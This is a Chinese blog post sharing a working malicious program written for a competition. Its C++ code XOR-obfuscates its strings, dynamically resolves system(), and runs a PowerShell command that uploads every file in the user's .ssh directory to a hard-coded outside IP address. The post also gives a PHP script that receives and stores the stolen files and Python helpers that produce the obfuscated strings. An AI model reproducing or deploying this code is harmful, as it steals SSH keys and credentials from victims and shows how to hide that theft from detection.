版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/think_ycx/article/details/81086159
上周写的一个恶意代码片段,功能为:
C++实现读取"C:\Users\thinkycx\.ssh\"目录下所有文件(不包括子文件夹),使用getProcessAddress获取system函数地址,动态调用system执行命令:powershell上传文件。
测试powershell功能用的上传命令,注意powershell代码中的\"代表转义的"。
powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\known_hosts\""由于比赛的要求,对字符串做了简单的异或混淆。
服务端recvpost.php脚本:
<?php
$input = file_get_contents("php://input");
echo $input;
$myfile = fopen("/tmp/testfile.txt", "w") or die("Unable to open file!");
fwrite($myfile, $input);
fclose($myfile);C++实现代码:
#include <iostream>
#include <dirent.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
using namespace std;
int main()
{
DIR *dir;
struct dirent *ptr;
typedef void (WINAPI *PGNSI)(char *);
//powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\known_hosts\""
char cmdline[0x100]="\x1d\x2\x1a\x8\x1f\x1e\x5\x8\x1\x1\x4d\x4f\x24\x3\x1b\x2\x6\x8\x40\x3f\x8\x1e\x19\x20\x8\x19\x5\x2\x9\x4d\x40\x38\x1f\x4\x4d\x31\x4f\x5\x19\x19\x1d\x57\x42\x42\x59\x58\x43\x5e\x5f\x43\x5b\x5b\x43\x5c\x59\x5e\x57\x55\x5d\x5d\x5c\x42\x1f\x8\xe\x1b\x1d\x2\x1e\x19\x43\x1d\x5\x1d\x31\x4f\x4d\x40\x20\x8\x19\x5\x2\x9\x4d\x3d\x2\x1e\x19\x4d\x40\x24\x3\x2b\x4\x1\x8\x4d\x31\x4f\x2e\x57\x31\x38\x1e\x8\x1f\x1e\x31\x19\x5\x4\x3\x6\x14\xe\x15\x31\x43\x1e\x1e\x5\x31";//"\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x20\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x52\x65\x73\x74\x4d\x65\x74\x68\x6f\x64\x20\x2d\x55\x72\x69\x20\x5c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x34\x35\x2e\x33\x32\x2e\x36\x36\x2e\x31\x34\x33\x3a\x38\x30\x30\x31\x2f\x72\x65\x63\x76\x70\x6f\x73\x74\x2e\x70\x68\x70\x5c\x22\x20\x2d\x4d\x65\x74\x68\x6f\x64\x20\x50\x6f\x73\x74\x20\x2d\x49\x6e\x46\x69\x6c\x65\x20\x5c\x22\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x74\x68\x69\x6e\x6b\x79\x63\x78\x5c\x2e\x73\x73\x68\x5c";
char cmdline_end[4] = "\x4d\x33\x33"; //0x11 \x5c\x22\x22";
char foldername[100] = "\x50\x29\x3c\x46\x60\x76\x61\x60\x3c\x67\x7b\x7a\x7d\x78\x6a\x70\x6b\x3c\x3d\x60\x60\x7b\x3c"; // 0x13 "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f\x74\x68\x69\x6e\x6b\x79\x63\x78\x2f\x2e\x73\x73\x68\x2f";
char msvcrtdll[11] = "\x2e\x30\x35\x20\x31\x37\x6d\x27\x2f\x2f"; //"msvcrt.dll";
char funcname[7] = "\x64\x6e\x64\x63\x72\x7a"; //"system";
char payload[0x200]={0};
int sizeall;
sizeall = strlen(cmdline);
for(int i=0; i<sizeall; i++){
if(i<3){
cmdline_end[i] ^= 0x11;
}
if(i<6){
funcname[i] ^= 0x17;
}
if(i<10){
msvcrtdll[i] ^= 0x43;
}
if(i<23){
foldername[i] ^= 0x13;
}
if(i<sizeall){
cmdline[i] ^= 0x6d;
}
}
dir = opendir(foldername);
PGNSI pGNSI;
pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(TEXT(msvcrtdll)),funcname);
if(dir){
while((ptr = readdir(dir)) != NULL){
if(!strcmp(ptr->d_name,".") || !strcmp(ptr->d_name,"..")){
continue;
}
sprintf(payload,"%s%s%s", cmdline, ptr->d_name,cmdline_end );
pGNSI(payload);
}
}
return 0;
}
补充一下字符串转换脚本
字符串转化成"\xAB\xCD"形式:
#!/usr/bin/env python
# coding=utf-8
a = r'powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\\'
a = r'C:/Users/thinkycx/.ssh/';
str = ''
for i in a:
str += "\\x%2x"% ord(i)
print str"\xAB\xCD"和key异或一下输出:
#!/usr/bin/env python
# coding=utf-8
a = "\x5c\x22\x22"
a = "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f\x74\x68\x69\x6e\x6b\x79\x63\x78\x2f\x2e\x73\x73\x68\x2f"
a = "msvcrt.dll"
a = "system";
a = "\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x20\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x52\x65\x73\x74\x4d\x65\x74\x68\x6f\x64\x20\x2d\x55\x72\x69\x20\x5c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x34\x35\x2e\x33\x32\x2e\x36\x36\x2e\x31\x34\x33\x3a\x38\x30\x30\x31\x2f\x72\x65\x63\x76\x70\x6f\x73\x74\x2e\x70\x68\x70\x5c\x22\x20\x2d\x4d\x65\x74\x68\x6f\x64\x20\x50\x6f\x73\x74\x20\x2d\x49\x6e\x46\x69\x6c\x65\x20\x5c\x22\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x74\x68\x69\x6e\x6b\x79\x63\x78\x5c\x2e\x73\x73\x68\x5c"
print len(a)
str1 = ''
for i in a:
c = ord(i) ^ 0x6d
str1 += "\\x%x"% c
print str1